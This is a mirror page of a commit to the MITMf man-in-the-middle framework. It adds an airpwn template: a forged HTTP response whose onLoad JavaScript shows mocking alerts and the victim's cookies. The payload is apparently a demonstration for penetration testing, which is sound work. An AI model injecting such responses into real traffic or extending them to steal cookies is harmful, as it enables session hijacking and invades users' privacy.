mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-08-14 02:37:06 -07:00
major changes for Responder integration
This commit is contained in:
parent
5b22d057bb
commit
240af4ad9d
74 changed files with 6472 additions and 245 deletions
13
config/airpwn_templates/js_html
Normal file
13
config/airpwn_templates/js_html
Normal file
|
@ -0,0 +1,13 @@
|
|||
HTTP/1.1 200 OK
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
|
||||
<html><head><title>pwned</title>
|
||||
</head><body onLoad="
|
||||
alert('hi');
|
||||
alert('you');
|
||||
alert('are');
|
||||
alert('so');
|
||||
alert('owned');
|
||||
alert('cookie: ' + document.cookie);">
|
||||
|
Loading…
Add table
Add a link
Reference in a new issue